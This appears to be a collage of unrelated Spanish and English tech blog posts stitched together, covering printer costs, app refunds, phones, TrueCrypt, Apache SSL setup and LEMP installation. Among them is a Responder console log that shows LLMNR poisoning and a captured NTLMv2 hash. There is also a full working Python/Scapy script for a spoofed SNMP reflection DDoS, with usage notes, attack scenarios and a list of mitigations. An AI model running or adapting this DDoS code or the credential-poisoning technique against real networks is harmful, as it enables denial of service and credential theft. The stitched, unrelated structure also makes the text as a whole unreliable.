Jesús Morgan

Uno de los costes que hay que atacar en las empresas es el relativo a la impresión de documentos. Aquí por lo general nos encontramos con muchas alternativas y hoy vamos a ver qué es más rentable para la pyme, las soluciones de pago por uso o nuestra propia impresora.

El objetivo es lograr que el coste por copia impresa sea el más bajo posible. A esto le tendríamos que sumar una política de ahorro de número de copias impresas que haga que disminuya el coste total, no sólo teniendo en cuenta el número de páginas que hemos imprimido.

Me compro mi impresora

En este caso la empresa decide invertir en su propia impresora, lo que le obliga a realizar un desembolso mayor. A cambio la impresora tendrá una vida útil que podemos explotar sin importar cuantas copias hemos sacado. Puede ser una opción muy rentable si cuidamos bien la impresora y tenemos maña para retirar un atasco de papel, por ejemplo, sin que se queden restos en su interior.

Aquí tendríamos que sumar los costes de los consumibles, pero también del servicio técnico, que tendrá que actuar más a medida que la impresora va cumpliendo años y lleva un mayor número de páginas impresas en su historial. Por este motivo suele ser la opción elegida cuando la empresa tiene su propio servicio técnico.

Una forma de evitar que las impresoras de queden obsoletas así como tener que realizar un desembolso inicial fuerte es acudir a un modelo de renting, por el que pagamos una cantidad mensual por nuestra impresora y finalizado el contrato decidimos si nos la quedamos o buscamos otra más moderna.

Servicios de pago por copia realizada

Pagamos por página impresa una cantidad en función del tipo de impresora que hemos elegido. Las impresoras de gama más alta son las que tienen un coste más elevado, mientras que las más básicas tendrán un coste menor. También varía en función del número de páginas, aplicando descuentos a medida que el número de páginas impresas es mayor.

El mantenimiento y reparación de las impresoras corre por cuenta del prestador del servicio. Por lo general se dan dos tipos de contratos:

• Con los consumibles incluidos donde además del mantenimiento nos facilitarán todos los consumibles de la impresora. Suele ser un poco más caro que el otro modelo,

• Los consumibles los paga el cliente de manera que si se acaba el tóner de la impresora tenemos que adquirir uno nuevo. La ventaja de este modelo es que el coste por página es más bajo.

La ventaja de este modelo es que tenemos más o menos unos costes de impresión fijos, lo que nos permitirá no tener que hacer grandes inversiones iniciales, además de tener el mantenimiento de la máquina solucionado, lo que muchas veces es un ahorro si no tenemos servicio técnico propio.

Comparando costes entre ambos modelos

Cuanto más nos dure la impresora en buen estado más rentable es tenerla en propiedad

Para realizar esta comparación necesitamos saber de forma aproximada el número de impresiones que realizamos de forma anual. En el caso de coste por uso es muy sencillo porque solo tenemos que multiplicarlo por el coste de cada página.

En el caso de que hayamos adquirido nuestra propia impresora tendríamos que dividir el coste de la impresora entre cinco, poniendo que este sea su periodo de vida útil. A esto le tenemos que sumar los costes de los consumibles, y aquí prestar atención no sólo al tóner, sino también al kit de mantenimiento que necesitan muchas impresoras pasado un determinado número de copias, el fusor u otros elementos que se pueden considerar también fungibles por parte de la marca.

Por último tendríamos que sumarle un número de horas determinado de servicio técnico, que aumentará como hemos comentado a medida que la impresora sea más vieja. Aquí es interesante ver el tipo de empleados que tiene nuestra empresa, ya que en ocasiones puede hacer que este valor se dispare si no hacen un buen uso de la impresora.

En Tecnología Pyme | Tres opciones para reducir el coste de impresión en la empresa

Imagen | Pixabay 1 & 2

-
La noticia Soluciones de pago por uso o nuestra propia impresora, ¿qué es más rentable para la pyme? fue publicada originalmente en Tecnologiapyme por Carlos Roberto.

The Exact Field Service App is already used by many customers today. Statistics show that more and more service oriented organizations equip their service engineers with an iPad rather than paper files. They have seen the benefits of linking the activities of their service engineers directly in the back-office. It allows them to approve the activity for invoicing, send a confirmation email to the client when the job has been done and always have an update planning ready for the engineer. Also all stock movements made by the engineer are directly managed in the back-office and never lose track of a signed service order again!

Version 2.0 of the Field Service App offers new features and an improved user interface. Most obvious changes are:

• A new activity can be created from the service order. This way the engineer can send a message to the internal organization when he thinks there is a need for it. This can be that maintenance of a machine is very poor, that he sees an opportunity to replace the existing machine by another one or to request the planner to plan a follow-up appointment at the customer side. Note that user cannot create a new service activity.
• The Field Service App can be secured by the use of a pin code. In the setting, the engineer can define his pin code. Now every time the App is used, a pin code needs to be filled in first.
• The user interface has been adjusted. Goal is to make the service order screen easier to use. This has been done by cleaning up the screen and offer only that information the engineer needs most. Note that all information is still there, only not directly in your face.
• Get informed when an item you want to add to the service order is blocked (only available with latest PU 252 update)

Besides these new features there are hundreds of small adjustments in this version of the Field Service App. Some adjustments are visible, most are not. Have a look and feel the difference!

important: As mentioned, a lot of changes have been made in the App. The communication with the Synergy back-office is improved and fully runs via web services now, just like the other new Apps that are launched this year. Because of this change it is required to open up the web services in your Synergy back-office. You can do this in the Web services settings menu, located in the System tab. Check the ‘Exclude web services function rights’ setting and make sure all checkboxes in the right column are checked. When this is done run an IISreset and you’re save and done! The ‘Exclude web services function rights’ setting allows users to use the web services mentioned in the right column based on their Synergy roles and rights.

Muchos usuarios sabréis que en el momento que compráis una aplicación en la Play Store tenéis 15 minutos para que se os reembolse de nuevo el precio de la app si por lo que fuera no habéis quedado contentos con la adquisición. Una acción bastante fácil de realizar después de haber comprado la nueva app, ya que desde la misma Play Store tenéis el botón de reembolsar.

Tenemos que tener en cuenta que con ciertas apps estos 15 minutos pueden quedar en muy pocos si tenemos que descargar una importante cantidad de datos debido a que estemos ante una aplicación que tenga 1GB o más. Hay una manera de poder reembolsar el dinero de la aplicación que finalmente no nos ha convencido. A continuación os enseñamos como realizar ese reembolso si habéis pasado los 15 minutos reglamentarios.

Google ahora tiene un proceso automático para reembolsaros las aplicaciones después de estos primeros 15 minutos. Desde Android Police han encontrado que Google tiene una franja de tiempo de 48 horas después de la compra sin tener que mediar con el desarrollador como si sucedía anteriormente, cuando había que contactar con él para que nos reembolsaran la cantidad de la app.

Hay que tomar en cuenta que estamos ante un sistema que a bien seguro que Google tiene herramientas para aquellos que intenten usarlo regularmente para hacer un uso indebido de él.

Cómo reembolsar una app después de los 15 minutos reglamentarios

• Lo primero que debéis hacer es ir, desde vuestro ordenador, a la tienda de aplicaciones de Google Play a “Mis pedidos”

• En las últimas compras realizadas veréis un icono con tres puntos el cual debéis pulsar “Informar de un problema” en la app seleccionada

• Del menú seleccionáis “quiero solicitar un reembolso”

• Solicitáis el reembolso

Una importante ayuda para aquellos usuarios que no podrán disfrutar de un juego y no tuvieron el tiempo necesario para comprobarlo en la franja de tiempo disponible para el reembolsarlo. Y recordar que es un sistema del cual no se puede abusar ya que Google pondrá trabas.

El artículo Cómo reembolsar una app después de los 15 minutos reglamentarios ha sido originalmente publicado en Androidsis.

root@kali:~# git clone https://github.com/SpiderLabs/Responder.git

root@kali:~# cd Responder/
root@kali:~/Responder# ls
Certs                FixInternet.exe   LDAPPackets.py       Responder.py
CHANGELOG            HTTPCookies       odict.py             SMBPackets.py
Denied.html          HTTPPackets.py    RAPLANMANPackets.py  SMBRelay.py
DHCP.py              HTTPProxy.py      README.md            SMTPPackets.py
Fingerprint.py       Icmp-Redirect.py  RelayPackets.py      SQLPackets.py
FingerprintRelay.py  IMAPPackets.py    Responder.conf

root@kali:~/Responder# python Responder.py -i 192.168.142.128 -I eth0 -d SMB -b 0 -r 1 -v
NBT Name Service/LLMNR Responder 2.0.
Please send bugs/comments to: lgaffie@trustwave.com
To kill this script hit CRTL-C

[+]NBT-NS, LLMNR & MDNS responder started
[+]Loading Responder.conf File..
Global Parameters set:
Responder is bound to this interface: eth0
Challenge set: 1122334455667788
WPAD Proxy Server: False
WPAD script loaded:  function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
HTTP Server: ON
HTTPS Server: ON
SMB Server: ON
SMB LM support: False
Kerberos Server: ON
SQL Server: ON
FTP Server: ON
IMAP Server: ON
POP3 Server: ON
SMTP Server: ON
DNS Server: ON
LDAP Server: ON
FingerPrint hosts: False
Serving Executable via HTTP&WPAD: OFF
Always Serving a Specific File via HTTP&WPAD: OFF

LLMNR poisoned answer sent to this IP: 192.168.142.1. The requested name was : servidor1.
[+]WPAD (no auth) file sent to: 192.168.142.1

LLMNR poisoned answer sent to this IP: 192.168.142.1. The requested name was : servidor1.
[+]SMB-NTLMv2 hash captured from :  192.168.142.1
[+]SMB complete hash is : prueba::DOMINIO:1122334455667788:1D863E3C5746398740BBD893B1F7B43B:01010000000000684CF017068466D9E239FD90000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E0061006C000500160C006F00630061006C000073006D006200310032002E00680030003000000000000000010000000020009E00000C5EC24000A0F2F627F8D95AAB1740E16A2D24BE1C9B0E222697E60D026DBF5C5C006C006F00634C3451030A001000000000000000000000000000000000000900120063006900660073002F006500760061006E000000000000000000

[[+]FTP User:  test
[+]FTP Password is:  test

[+]HTTP-User & Password: test:test
[+]HTTP GET request from : 192.168.142.1. The HTTP URL requested was: /favicon.ico 
[+]HTTP-User & Password: test:test
[+]HTTP GET request from : 192.168.142.1. The HTTP URL requested was: /favicon.ico 
[+]HTTP-User & Password: test:test

[+]HTTPS-User & Password: test:test

[LDAP]Clear Text User & Password is: :

Este smartphone es la prueba irrefutable de que el auténtico lujo también tiene cabida en el mercado de los teléfonos móviles. A todos los que un iPhone 5s de Apple, un Xperia Z2 de Sony o un Galaxy S5 de Samsung nos parece caro, el precio del nuevo Signature Touch de la firma inglesa Vertu va a provocar que nos desmayemos: cuesta más de 8.000 euros.

Es evidente que con este precio no está pensado para el gran público. Solo unos pocos ricachones podrán hacerse con él. De hecho, en su fabricación Vertu emplea materiales tan exóticos como el titanio de su chasis, el zafiro que protege su pantalla y la piel que lo embellece. Pero la característica que más llamará la atención a cualquier entusiasta de la fotografía es su cámara de fotos, que ha sido certificada por Hasselblad.

Curiosamente, en la página web del fabricante apenas podemos encontrar información acerca de la cámara trasera de este teléfono. Tan solo sabemos que incorpora un sensor de 13 megapíxeles con doble flash LED, y que la cámara frontal tiene una resolución de 2,1 megapíxeles. Otro detalle de «distinción»: su sonido ha sido calibrado por Bang & Olufsen.

Por lo demás, las especificaciones de este móvil no son nada del otro mundo. De hecho, los últimos smartphones premium que han lanzado marcas como Sony, LG o Samsung lo superan. Tiene un SoC Snapdragon 800 a 2,3 GHz con cuatro núcleos, 2 gigabytes de RAM, 64 gigabytes de almacenamiento y una pantalla Full HD de 4,7 pulgadas. Y vendrá con Android 4.4 KitKat, carga inalámbrica y una batería de 2.275 mAh.

Quizás la colaboración de Hasselblad garantice cierta solvencia al tomar fotografías con él, pero es evidente que su precio lo posiciona como un artículo de lujo sin demasiado atractivo para la mayor parte de nosotros. Estará disponible este mismo mes de junio.

Más información | Vertu
En Xataka Foto | Ya podemos «jugar» con la profundidad de campo en los smartphones con Android 4.4
En Xataka Móvil | El nuevo Vertu Signature Touch de lujo llega con titanio, zafiro y piel por nada menos que 8.000 euros

-
La noticia Vertu prepara el Signature Touch, un móvil de 8.000 euros con una cámara certificada por Hasselblad fue publicada originalmente en Xataka Foto por Juan Carlos López.

El objetivo de esta entrada es presentar una herramienta que denomine snmpddos.  Esta  herramienta permite utilizar servidores SNMP V2c para realizar un ataque de denegación de servicio distribuido basado en reflexión (SNMP reflected attack);   Antes de enfocarnos en la práctica de este ataque  vamos  a  explicar en qué consiste y como funciona.

Funcionamiento del ataque:

Bueno antes de entender la técnica de DDoS basada en reflexión SNMP, vamos recordar que SNMP es un protocolo de administración, su uso ha sido muy extendido para el monitoreo y supervisión de los dispositivos de red en entornos corporativos, existen tres versiones SNMP V1 (no recomendada), V2c (no recomendada)  y V3 (recomendada), las dos primeras versiones  tienen  autenticación débil (basado en el valor de la comunidad)  y no cifran la información, SNMP utiliza típicamente UDP como protocolo de transporte, utiliza los puertos  UDP/161 y UDP/162 (traps).

Los dos factores determinantes para ejecutar el ataque son los siguientes:

1. En una comunicación basada en protocolo UDP (no orientada a la conexión) y por motivos de eficiencia, los datos se envían y se reciben sin verificar la conexión con el origen o destino de la misma y se da por hecho la correcta entrega o recepción de datos. Esto nos permite modificar la dirección IP origen dando pie al “IP spoofing”.
2. Por otra parte el protocolo SNMP permite que se realicen consultas de gran volumen a través del tipo de solicitud llamado  “GetBulkRequest”, esta solicitud  en la V2c se caracteriza por que el tamaño de su respuesta (423-1560 Bytes) es mucho más grande que el de la solicitud (0-102 Bytes), esto significa que existe un efecto de amplificación ya que la respuesta es más grande que la solicitud

De acuerdo a lo explicado, a todas las solicitudes SNMP tipo GetBulkRequest que se hagan a un servidor SNMP modificando la IP origen (IP Spoofing)  por la IP de la víctima, el servidor SNMP responderá con respuestas de gran tamaño a IP la víctima. (tal como lo muestra la siguiente imagen).

Si esto mismo lo masificamos obtendremos un ataque de denegación distribuido basado en reflexión SNMP, tal como se muestra en la siguiente imagen:

SCRIPT snmpddos
Este script se encuentra escrito en Python y hace uso de Scapy, funciona perfectamente en Bactrack 5 R3 y KALI. El código se encuentra en GitHub y se puede descargar desde https://github.com/jevalenciap/snmpddos/blob/master/snmpddos.py

# Autor: Juan Esteban Valencia Pantoja jevalenciap at gmail dot com
import sys
import random
import logging # La siguiente  linea es usada para omitir los errores de IPV6 que pueden aparecer por importar scapy.
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import argparse
import os
import urllib2
if os.getuid() != 0: # Valida si el script esta siendo corrido como root
    print("Debes ejecutar este script como root.")
    sys.exit(1)
parser = argparse.ArgumentParser(description='Esta herramienta contruida con fines educacionales permite simular el comportamiento de  un ataque de denegacion de servicio distribuida basado en reflexion utilizando el protocolo SNMP V2c (DDoS SNMP reflected attack). ') # Esta y las siguientes 4 lineas controlan y definen los argumentos ingresados
parser.add_argument('-d', action="store",dest='snmp_server', help='La IP destino del servidor SNMP(argumento mandatorio)')
parser.add_argument('-c', action="store",dest='community', help='La comunidad SNMP(por defecto es public).')
parser.add_argument('-p', action="store",dest='port', help='El puerto destino del servidor SNMP(por defecto es UDP 161).')
parser.add_argument('-v', action="store",dest='victim_IP', help='La IP de la victima que recibira el ataque(argumento mandatorio).')
parser.add_argument('-s', action="store",dest='count', help='La cantidad de paquetes que deseas enviar,puedes enviar infinitos paquetes ingresando  X o x (argumento mandatorio).')
args = parser.parse_args()

if len(sys.argv) == 1: # Obliga a mostrar el texto del 'help' sino hay argumentos ingresados.
    parser.print_help()
    sys.exit(1)
args = vars(args) # Convierte los argumentos en formato diccionario para facil manejo.
iterationCount = 0 # Variable usada en el ciclo while para controlar la cantidad de veces que un paquete es enviado.

oid ="1.3.6.1.2.1.1.1" # El OID conocido como sysDescr fue el que mejores resultados obtuvo en las pruebas de laboratorio.

if args['port' ] == None :
    uport= 161 # Si no se ingresa el puerto, por defecto sera 161/UDP
else:
    uport= int(args['port']) # La variable uport toma el valor del puerto 

if args['community']  == None :
    communi= "public" # Si no se ingresa la comunidad , por defecto sera public
else:
    communi= args['community']

if args['count'] == "X" or args['count'] == "x": # Si se ingresa x o X se enviara infinitos paquetes
      while (1 == 1):
        w =IP(dst=args['snmp_server'],src=args['victim_IP'])/UDP(sport=RandShort(),dport=uport)/SNMP(version="v2c",community=communi,PDU=SNMPbulk(id=RandNum(1,200000000),max_repetitions=100,varbindlist=[SNMPvarbind(oid=ASN1_OID(oid)), SNMPvarbind(oid=ASN1_OID(oid))]))# Esta linea construye el paquete SNMP utilizando los argumentos ingresados
        send(w,  verbose=0) # Envia el paquete
        iterationCount = iterationCount + 1
        print(str(iterationCount) + " Paquete enviado")# Mensaje en pantalla
else: # Se ejecuta si el usuario digita la cantidad de paquetes que va enviar
    while iterationCount < int(args['count']):
        w =IP(dst=args['snmp_server'],src=args['victim_IP'])/UDP(sport=RandShort(),dport=uport)/SNMP(version="v2c",community=communi,PDU=SNMPbulk(id=RandNum(1,200000000),max_repetitions=100,varbindlist=[SNMPvarbind(oid=ASN1_OID(oid)),SNMPvarbind(oid=ASN1_OID(oid) )]))# Se envia paquete SNMP  utilizando los argumentos ingresados
        send(w,  verbose=0) # Envia el paquete
        iterationCount = iterationCount + 1
        print(str(iterationCount) + " Paquete enviado")
print("Todos los paquetes fueron enviados exitosamente.")# Mensaje mostrado cuando todos los paquetes han sido enviados

Utilizando la opción  -h podemos ver las opciones

En el siguiente ejemplo enviamos 7 solicitudes SNMP tipo GetBulkRequest al servidor  SNMP con IP 10.0.0.1 (Router Cisco), haciendo una suplantación de la IP origen para que todas las respuestas del servidor SNMP sean enviadas a la IP de la víctima es decir a la IP 10.0.0.3. En esta solicitud se utiliza la comunidad SNMP ‘public’, es la que va por defecto si el argumento –c no es especificado, al igual que el puerto destino por defecto es UDP/161 si no es especificado

En Wireshark podemos ver  que el tamaño de la solicitud es de 97 Bytes.

En la siguiente imagen podemos ver la respuesta amplificada que le envía el servidor  SNMP (10.0.0.1) a la víctima (10.0.0.3) en donde se aprecia que tiene un tamaño de 1438 Bytes. Adicionalmente la victima envía un paquete ICMP de port unreacheable al servidor SNMP generando tráfico adicional.

En este último ejemplo a diferencia del anterior se envían paquetes constantemente (argumento –s X), y se especifica la comunidad SNMP en “private” (argumento –c private)

Cuando se requiera trabajar con  IPs publicas validar que el dispositivo de borde no haga NAT a este tráfico. También no deben existir configuradas ACL en los routers  y demás dispositivos de capa3 del ISP que impidan el  IP spoofing.

Escenarios de ataque

• -Un atacante que tenga acceso lógico  a una Subred o VLAN de servidores en un entorno corporativo mediano (superior a 100 servidores) donde todos los servidores estén siendo monitoreados a través de SNMP, puede causar alto impacto alto en la disponibilidad de los servicios que ofrece la victima del ataque.
• Muchos proveedores de servicio de Internet dejan habilitado por defecto SNMP en los enrutadores que instalan nuestras casas para la prestación del servicio, eso quiere decir que tienen configurada la comunidad por defecto llamada “public” y a merced de que sean utilizados para hacerle una denegación de servicio a tu conexión de Internet.
• Por ultimo tenemos las botnets, que a través de sus consolas de control pueden enviar comandos a las maquinas infectadas (bots) para que generen este tipo de tráfico a la víctima sin que este sea percibido por los bots.

Mitigaciones:

• No exponer a Internet el protocolo SNMP, recomendable utilizar VPNs IPsec sitio a sitio para comunicar las consolas de administración (NMS) con dispositivos administradoso en su defecto aplicar políticas de Firewall para filtrar solamente el  trafico SNMP a IPs publicas específicas.
• Utilizar en los ambientes corporativos VLAN o subredes de administración ( SNMP, HTTP, HTTPS, RDP, SSH, TELNET, etc…) y deshabilitar el acceso administrativo a las demás interfaces de red de los servidores o equipos de red.
• Muchos fabricantes de UTMs y Firewall de nueva generación no permiten IP spoofing por defecto, una buena práctica que evita el IP spoofing  a nivel de Firewall es  siempre especificar el direccionamiento origen en las reglas o políticas que se crean (no dejarlas any).
• Existen dispositivos comerciales y servicios en la nube especializados en detener ataques DDoS.
• No utilizar las comunidades por defecto public y private, recuerden que para las V1 y V2 de SNMP el nombre de la comunidad es lo único que se utiliza para autenticarse al servidor SNMP y poder tener acceso a la información  (lectura/escritura)   por lo tanto el valor de la comunidad se debe escoger siguiendo las mismas buenas practicas que para una  contraseña robusta.
• Utilizar SNMP V3 cifra los datos y  la autenticación es más robusta.
• Exista una labor muy grande que tienen que hacer los ISP para evitar el IP spoofing en sus dispositivos de red y evitar los ataques DDoS de reflexión.
• Siempre que se instale una impresora o cualquier dispositivo a la red validar que no tenga habilitado por defecto SNMP.

Articulo escrito por Juan Esteban Valencia Pantoja para La Comunidad DragonJAR

Hace unos días se reportaba la misteriosa desaparición de Truecrypt, el famoso software para cifrar discos. En su página de sourceforge dicen que no era seguro y que podía contener vulnerabilidades y que recomiendan el uso de Bitlocker Drive Encryption, que es el software de cifrado que viene por default en Windows Vista, 7 y 8. Incluso mencionan que su desarrollo se detuvo en mayo, después de que se terminara el soporte para Windows XP.

Ahora unos desarrolladores decidieron forkear el código y basarlo en Suiza, mientras que la Gibson Research Corporation dice “No, Truecrypt sigue siendo seguro”, por lo menos hasta que el Open Crypto Audit diga lo contrario. El Open Crypto Audit es un proyecto para auditar el código de Truecrypt, y en Abril comunicaron que la primera parte de la auditoría estaba hecha y de las 11 vulnerabilidades que encontraron, no había ninguna grave.

¿Entonces, que pasa?

Según el intercambio de Tweets entre Steven Barnhart y Matthew Green (quien lidera la Open Crypto Audit), Steven intentó contactar con alguien involucrado y recibió un par de mails de alguien llamado “David”.

¿Qué dice David?: No hay interés. Podría decirse que no hay interés en seguir desarrollando Truecrypt. En otro mail dice que Bitlocker es “lo suficientemente bueno” y que Windows (XP) era el objetivo original del proyecto. También dice que no hubo contacto con el gobierno. Steven le preguntó si estaría dispuesto a relicenciar el código con otra licencia o hacer un fork. David responde que eso sería dañino dado que sólo ellos (los desarrolladores de Truecrypt) son familiares con el código.

Igual, eso es sólo una teoría de por qué desapareció. Existen otras como que consiguieron romper el cifrado, que se conoce la identidad de sus desarrolladores (la marca está registrada al nombre de David Tesarík, quizás sea el mismo que envió los mails), que Dios existe y está del lado de la NSA, etc.

Mientras tanto, para los usuarios de Linux existen varias alternativas (con licencias menos restrictivas que la de truecrypt): dm-crypt, LUKS, eCryptfs, EncFs, RealCrypt (no es más que truecrypt con otra marca), ZuluCrypt y otras más.

La entrada Truecrypt: Una desaparición sin mucho para explicar aparece primero en Desde Linux.

Primero que nada cabe destacar que esta guía está hecha sobre un sistema Ubuntu 12.04, aunque no imposibilita que los comandos expuestos puedan ser utilizados en versiones anteriores o posteriores.

Hoy en día existen muchos medios por los cuales viaja nuestra información personal. Estando en la era de la información, el usuario necesita confiar en que su información viaje a cualquier lugar del mundo de forma segura e íntegra a través de internet. En la actualidad existen distintas maneras de encriptar información, una de estas maneras son el uso de certificados SSL.

Acerca de los certificados SSL

Un certificado SSL(Secure Socket Layer) es un protocolo criptográfico de seguridad desarrollado originalmente por Netscape, que busca, mediante la codificación de la información del sitio, crear una conexión más segura. Esto se cumple mediante la utilización de una clave de seguridad de 2048 bits que es conocida solo por el usuario y el servidor al que se está conectado.

Para utilizarlo es necesario que la web tenga instalado un sistema de certificados SSL y que el navegador utilizado por los usuarios cuente con soporte para SSL(hoy en día todos los navegadores cuentan con soporte a ésta tecnología).

Rompiendo la inercia

En el caso de que no tengas instalado apache en el servidor, se puede descargar tipeando la siguiente orden:

sudo apt-get install apache2

Activando el módulo SSL

Para habilitar el módulo SSL tecleamos lo siguiente:

sudo a2enmod ssl

Reiniciamos Apache:

sudo service apache2 restart

Almacenamiento de clave y certificado

En este paso tenemos que crear un directorio en donde se almacenará la clave generada por el servidor y el certificado.

Tecleamos:

sudo mkdir /etc/apache2/ssl

Creando un certificado autofirmado

Cuando solicitamos un nuevo certificado, se puede especificar el tiempo de validez del certificado hasta que expire, e incluyendo si queremos encriptarlo en 2048 bits, aunque esta parte deberíamos dejarla tal como está ya que es lo que se utiliza hoy en día.

Cuando solicitamos un nuevo certificado , podemos especificar el tiempo que el certificado debería seguir siendo válido cambiando el 365 con el número de días que preferimos . Tal y como está este certificado caducará después de un año .

sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/apache2/ssl/apache.key -out /etc/apache2/ssl/apache.crt

Con el siguiente comando vemos que creamos los archivos en donde estará el certificado(apache.crt) y la clave(apache.key), ambos en la misma carpeta.

Este comando le mostrará desde la terminal terminal una lista de campos que necesitan ser llenados.

La línea más importante es ” Common Name ” . Introduzca su nombre de dominio oficial aquí o , si todavía no tiene uno, la dirección IP de su sitio.

You are about to be asked to enter information that will be incorporated into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]: AR
State or Province Name (full name) [Some-State]:Buenos Aires
Locality Name (eg, city) []:CABA
Organization Name (eg, company) [Internet Widgits Pty Ltd]:DL Inc
Organizational Unit Name (eg, section) []:Depto de la CABA
Common Name (e.g. server FQDN or YOUR name) []:example.com

Email Address []:webmaster@dlinc.com

Estableciendo el Certificado

Ahora tenemos todos los componentes necesarios para el acabado del certificado. Lo siguiente que hay que hacer es configurar los hosts virtuales para mostrar el nuevo certificado.

Abra el archivo de configuración de SSL:

nano / etc/apache2/sites-available/default-ssl

Dentro de la sección que comienza con <VirtualHost _default_:443> , hacer rápidamente los siguientes cambios…

Añadir una línea con el nombre del servidor justo debajo de la dirección de correo electrónico del administrador del servidor :

ServerName ejemplo.com: 443

Reemplace ejemplo.com con su nombre de dominio DNS aprobado o dirección IP del servidor (debe ser el mismo que el “Common Name” en el certificado ) .

Encuentra las tres líneas siguientes , y asegúrese de que coincidan con las extensiones a continuación:

SSLEngine en

SSLCertificateFile / etc/apache2/ssl/apache.crt

SSLCertificateKeyFile / etc/apache2/ssl/apache.key

Guarde y salga del archivo.

Activando el nuevo host virtual

Antes de que el sitio web que funcionará en el puerto 443 pueda ser activado , necesitamos habilitar el host virtual:

sudo a2ensite default- ssl

Al tener todo configurado, reiniciaremos el servidor Apache que se volverá a cargar con todos los cambios en su lugar.

sudo service apache2 reload

En el navegador , escriba https://sudirección y podrá visualizar el nuevo certificado. Una vez que se ha configurado todo , se puede instalar un servidor FTP.
Espero que lo hayan disfrutado y sea de gran utilidad para aquellos que deseen enseñar con éste material o quieran utilizarlo para sus servidores Apache. Saludos!

¿Estas buscando un servicio de almacenamiento en la nube gratuito y que te ofrezca espacio de almacenamiento infinito para tus fotografías tomadas con Android?.

Si la respuesta es si deja de buscar por que lo acabas de encontrar, y es que Google Drive te ofrece espacio de almacenamiento infinito para guardar copia de todas tus fotografías tomadas con Android de manera totalmente gratuita. A continuación te explico en detalle los requisitos a cumplir y como activar esta opción desde tu dispositivo.

Requisitos a cumplir

Los requisitos a cumplir para obtener espacio de almacenamiento infinito y gratuito para nuestras fotos tomadas con Android son la mar de simples y se limitan a estos:

• Tener una cuenta de Gmail.
• Tener instalada la aplicación de Google+
• Seguir estos pasos que a continuación os detallo

Cómo conseguir espacio de almacenamiento infinito y gratuito para guardar nuestras fotos en Google Drive

Si cumplimos todos los requisitos arriba expuestos, ya estaremos en disposición de seguir este tutorial, y es que por defecto, el almacenamiento infinito para nuestras fotos a través de Google Drive no viene activado y lo tendremos que hacer de manera manual.

En principio contamos con la característica que Google nos ofrece guardar copias de seguridad en Google Drive de todas nuestras fotos a tamaño real, cosa que tendremos limitado al espacio de almacenamiento de nuestra cuenta de Drive que por defecto son 15 Gb. A continuación les voy a explicar, cómo obtener espacio de almacenamiento infinito o ilimitado, cambiando una opción para que Drive nos guarde las fotos con un tamaño máximo de 2048 píxeles.

Lo primero de todo será abrir la aplicación Fotos que nos viene con la instalación de Google+:

Seguidamente clicamos en el botón menú de la aplicación:

Luego en Ajustes:

Ahora seleccionamos la opción de Copia de seguridad automática:

Y en la nueva pantalla que se nos abre tendremos que, desde la primera opción, seleccionar una de nuestras cuentas de Google para después seleccionar la opción Tamaño de la foto.

Donde seleccionaremos la opción Tamaño estándar.

Por último activamos el botón de la parte superior derecha si es que no lo teníamos ya activado, y ya dispondremos de un espacio de almacenamiento ilimitado y completamente gratuito desde nuestra cuenta de Google y Google Drive.

El artículo Cómo obtener espacio de almacenamiento infinito para tus fotos en Google Drive ha sido originalmente publicado en Androidsis.

As many of you know, our very own Carrie Anne Philbin spent most of last year writing Adventures in Raspberry Pi. For some reason she keeps reminding me that, with 4.8 stars out of 5, it’s currently the highest-rated Raspberry Pi book on Amazon; I can’t imagine why.

Five star, schmive star

The last few chapters of the book concentrate on hardware interfacing using the Pi, and require a variety of electronic components. To make your life easier, we’ve assembled all the components into one convenient kit, which you can now buy in the Swag Store.

Cables and buttons and screens, oh my

Una de las caras más populares de Ubuntu es su desarrollo y dedicación al mundo de los servidores y al mundo empresarial. Dentro de esto, además de tener una versión dedicada en exclusivo al mundo de los servidores, Ubuntu está integrando y actualizando mucho software que se usa para el mundo empresarial y para el profesional de las redes y esto repercute de una manera u otra en los usuarios finales que quieran desarrollar una web o habilitar un servidor casero. La opción más usada para estos últimos usuarios es la instalación de un servidor LAMP en nuestro Ubuntu. La instalación de un servidor LAMP es muy común en las últimas versiones de Ubuntu, tal vez porque si es difícil su instalación, no se usaría en servidores profesionales. Pero ¿ cómo se instala un servidor LEMP? ¿Qué es un servidor LEMP? ¿ Puedo tener un servidor LAMP y LEMP en la misma máquina? Sigue leyendo y descubrirás respuestas a estas preguntas.

¿Qué es un servidor LEMP?

Para los que conozcáis los servidores LAMP, sabéis que son abreviaturas del software que llevar el servidor, en el caso de LAMP es Linux, Apache, Mysql y Php o Python. Es decir, un sistema operativo(Linux), software de gestión de un servidor( Apache), una base de datos( Mysql) y un lenguaje de servidor ( Php o Python). LEMP sería así una variación del paquete de software que trae LAMP, así, LEMP sería Linux, EngineX ( Nginx), Maríadb o Mysql y Php o Python. La única variación respecto a LAMP es que LEMP usa Nginx y no Apache como software encargado de gestionar el servidor, que para los novatos, comentar que es un gran cambio. Llegados a este punto, ¿ podría tener LAMP y LEMP en el mismo servidor? Por poder podrías tenerlo, sin embargo en pocas sesiones si no es en la primera, el servidor se colapsaría ya que se tiene dos gestores de servidores. Así, lo más recomendable es decantarse por uno u otro.

En los últimos meses, Nginx parece que está siendo la opción más deseada en el ámbito comercial, por lo que la solución LEMP parece que será el futuro, pero ¿ Cómo se instala?

Instalación de un servidor LEMP

El método más cómodo para instalar un servidor bien sea LAMP o LEMP es a golpe de teclado y terminal, por lo que abrimos la terminal y escribimos:

sudo apt-get install nginx

Nginx ya se encuentra en los repositorios oficiales, por lo que no hay problema. Ahora paramos, encendemos y reiniciamos el servidor Nginx para que Ubuntu empiece a reconocerlo y a introducirlo en su inicio, así pues escribimos:

sudo service nginx stop

sudo service nginx start

sudo service nginx restart

sudo update-rc.d nginx defaults

Y si esto resulta, deberíais ver un mensaje similar a este:

System start/stop links for /etc/init.d/nginx already exist.

